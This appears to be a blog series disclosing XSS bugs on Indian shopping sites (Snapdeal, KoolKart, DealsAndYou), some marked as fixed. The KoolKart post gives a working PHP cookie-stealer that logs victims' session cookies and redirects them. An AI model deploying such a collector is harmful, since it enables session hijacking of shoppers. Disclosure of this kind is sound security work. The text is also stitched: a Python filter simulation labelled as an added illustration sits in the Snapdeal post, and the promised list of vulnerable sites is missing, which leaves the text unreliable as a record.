Hey Snapdeal – You’ve got an XSS vulnerability [Fixed]


Update: Got a mail from the Snapdeal security team; this vulnerability has been fixed.
I just found an XSS vulnerability on a very popular Indian e-commerce site, snapdeal.com. Finding a working XSS pattern was a bit tricky, because searching for a string containing certain JavaScript functions such as “alert(” or “String.fromCharCode(” returned an “Access Denied” page. A search string containing “eval(”, however, didn’t trigger any error.
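The behaviour described above is a deny-list filter rather than output encoding. As an added illustration (not code from this post or from any of the sites mentioned), the following Python simulates a search endpoint behind a deny-list built from the two tokens the post saw blocked, and contrasts it with contextual HTML escaping of the reflected search term; the token list, sample queries and function names are assumptions made for this example.

```python
import html

# Deny-list assumed from the post's observation: "alert(" and
# "String.fromCharCode(" produced Access Denied, while "eval(" did not.
DENY_LIST = ("alert(", "String.fromCharCode(")

# Constructed sample search strings: one benign, two carrying script markup.
SAMPLE_QUERIES = [
    "samsung galaxy",
    "<script>alert(1)</script>",
    "<script>eval(x)</script>",
]


def denylist_allows(query: str) -> bool:
    """Mimic the observed filter: reject only queries containing a listed token."""
    lowered = query.lower()
    return not any(token.lower() in lowered for token in DENY_LIST)


def render_unsafe(query: str) -> str:
    """Reflect the search term into the page verbatim (the bug under discussion)."""
    return f"<p>Results for: {query}</p>"


def render_escaped(query: str) -> str:
    """Reflect the search term with HTML-text-node encoding (the actual fix)."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def search_page(query: str, escape_output: bool) -> str:
    """Simulated endpoint: deny-list first, then render with or without escaping."""
    if not denylist_allows(query):
        return "Access Denied"
    return render_escaped(query) if escape_output else render_unsafe(query)


def reflects_raw_markup(rendered: str, query: str) -> bool:
    """Detection check: did user-supplied markup reach the output unencoded?"""
    return ("<" in query or '"' in query) and query in rendered


if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        for escaping in (False, True):
            out = search_page(q, escaping)
            print(f"escape={escaping!s:5} raw_markup={reflects_raw_markup(out, q)!s:5} {out}")
```

Run as-is: the deny-list stops only the `alert(` query, the unescaped renderer reflects the `eval(` query verbatim, and the escaped renderer neutralises both without needing a deny-list at all.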

Screenshot: Snapdeal XSS Access-Denied page


Popular (and not so popular) Indian E-commerce websites with XSS vulnerabilities


I was going through a few Indian e-commerce websites and found XSS vulnerabilities in some of them. I’m not publishing the injection patterns for security reasons. If anyone from the companies listed below wants to know the injection pattern for their respective website, get in touch. Below is the list of vulnerable websites:

Screenshots for all the sites listed above follow.

KoolKart.com, get Kooler by sanitizing your input


Earlier, I demonstrated the XSS vulnerability in DealsAndYou (now fixed); this time I’ll demo an XSS bug on KoolKart.com. The whole process is described below.

Step 1 – Writing a PHP script (cookie-stealer.php) that saves the cookie sent back by the injected code.

<?php
// Read the cookie value passed via the querystring (or POST body)
$str = trim($_REQUEST['cookie'] ?? '');
$file = 'cookie.txt';
if (!empty($str)) {
    // Append a timestamped entry to the log file (create it if missing)
    $current = file_exists($file) ? file_get_contents($file) : '';
    $current .= date('Y-m-d H:i:s') . "\t\t" . $str . "\n\n\n";
    file_put_contents($file, $current);
    // Redirect back to koolkart, as described below
    header('Location: http://www.koolkart.com/');
}

The code is self-explanatory: it receives the cookie information via the querystring, saves it to a text file and redirects back to koolkart.

DealsAndYou, why you no sanitize inputs?

Image: Dealsandyou.com, Y U NO sanitize input

Update: Dealsandyou has fixed the bug and responded on Twitter with a thank-you.


I was looking at dealsandyou.com a couple of days back, and something (maybe their bad design) made me run an XSS vulnerability test on their “Search” input box using the XSS Locator code snippet. Voila! An alert box popped up, confirming my hunch.